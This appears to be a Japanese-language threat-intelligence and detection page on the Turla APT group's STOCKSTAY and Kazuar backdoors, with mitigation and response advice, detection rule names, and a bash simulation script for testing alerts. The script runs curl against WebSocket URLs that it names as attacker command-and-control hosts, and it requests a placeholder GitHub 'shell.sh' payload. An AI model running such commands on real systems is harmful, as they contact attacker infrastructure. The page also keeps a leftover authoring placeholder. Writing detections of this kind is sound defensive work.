Turla(シークレット・ブリザード):STOCKSTAYとKazuarバックドアの解説
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Turlaは長期間活動しているロシアに関連付けられたAPTグループで、FSBに関連し、政府や軍事のターゲットに対するサイバースパイ活動で知られています。このグループは、STOCKSTAYやKazuarバックドアを含むカスタムマルウェアに依存して、侵害された環境での長期的なアクセスを維持しています。また、GitHubやCloudflareなどの正当なクラウドサービスを頻繁に悪用して、コマンド・アンド・コントロールのトラフィックを隠蔽します。
調査
このレポートは、Turlaのマルウェアツールセットの進化を、STOCKSTAYおよびKazuarファミリーを中心に検討します。グループのインフラストラクチャ乗っ取り技術、コマンド・アンド・コントロールのためのサーバーレスプラットフォームの利用、WinRARパス移動のような脆弱性の悪用能力について分析しています。調査はまた、サンドボックス分析への露出を減らすための環境キーの使用を含めています。
緩和
企業は、トラフィックパターンが異常に見える場合には、GitHubやCloudflareなどの信頼されたWebプラットフォームの不正使用に対する強化された監視を展開するべきです。また、 CVE-2025-8088 のような脆弱性の迅速なパッチ適用は、不正なファイル書き込みを防ぐために不可欠です。防御者はまた、不正なルート証明書のインストールやTurlaの活動を示す可能性がある疑わしいPowerShellやVBScriptの実行を監視する必要があります。
対応
Turlaの活動が検出された場合、対応者は影響を受けたホストを隔離し、不正なローカル管理者アカウントの調査を行うべきです。プロセスツリーの詳細なレビューを行い、NVIDIAやBrotherプリンターのユーティリティなどの正当なバイナリを使用したDLLサイドローディングを明らかにすべきです。ネットワークのテレメトリーも異常なWebSocketトラフィックについてチェックされるべきであり、機械の信頼ストアを疑わしい証明書の変更のためにレビューする必要があります。
攻撃フロー
検出
可能な持続性ポイント [ASEPs – Software/NTUSER Hive] (via registry_event)
表示
LOLBAS WScript / CScript (via process_creation)
表示
Certutilのデータエンコードと証明書操作 (via cmdline)
表示
疑わしいPowershell文字列 (via powershell)
表示
可能なダイナミックDNSサービスへのアクセスが行われた (via dns)
表示
Kazuar PowerShell 3DES復号化活動 [Windows Powershell]
表示
Turla STOCKSTAY C2通信の検出:Secure WebSocketとGitHubステージング [Webserver]
表示
シミュレーション実行
前提条件: テレメトリー&ベースラインの前フライトチェックが完了していること。
論理: このセクションでは、検出規則をトリガーするために設計された敵の技術 (TTP) の正確な実行を詳細に説明します。コマンドとナarractiveは、識別されたTTPsを直接反映し、検出論理によって期待される正確なテレメトリーを生成することを目指します。抽象的または無関係な例は、誤診につながります。
-
攻撃ナラティブ&コマンド: 敵は攻撃の足がかりを確立し、現在C2通信を確立しようとしています。彼らは“living-off-the-land”アプローチを使い、サーバーレスプラットフォームに接続することで検出を回避しようとします。
onrender.comWebSocket接続を通じて。 同時に、彼らは2次ステージのペイロードを開発者のトラフィックに紛れ込ませるために公開GitHubリポジトリから引き出そうとしています。このシミュレーションではcurlandwscat(利用可能な場合) または標準のWebリクエストを使用して、検出論理で定義された特定のURLパターンを生成します。 -
回帰テストスクリプト: [Provide the exact, self-contained, and executable code snippet for the simulation.]
#!/bin/bash # STOCKSTAY C2 検出検証のためのシミュレーションスクリプト echo "[+] シミュレーション開始: STOCKSTAY C2 TTPs" # 1. トリガー: Renderを介したWebSocket C2(特定のURL) echo "[*] 悪意のあるRender URLへのWebSocket接続をシミュレート..." curl -k "wss://google-ai-labs-it.onrender.com/ws" # 2. トリガー: Glitchを介したWebSocket C2(特定のURL) echo "[*] 悪意のあるGlitch URLへのWebSocket接続をシミュレート..." curl -k "wss://wool-basalt-clock.glitch.me/ws" # 3. トリガー: GitHubステージング(広域ドメインマッチ) echo "[*] GitHubを介したペイロードのステージングをシミュレート..." curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh" echo "[+] シミュレーション完了。 SIEMにアラートがあるか確認してください。" -
クリーンアップコマンド:
# このシミュレーションによりホスト上に永続的なアーティファクトは作成されません。 # 作成された場合は一時的なbashファイルを削除してください。 rm -f simulation_stockstay.sh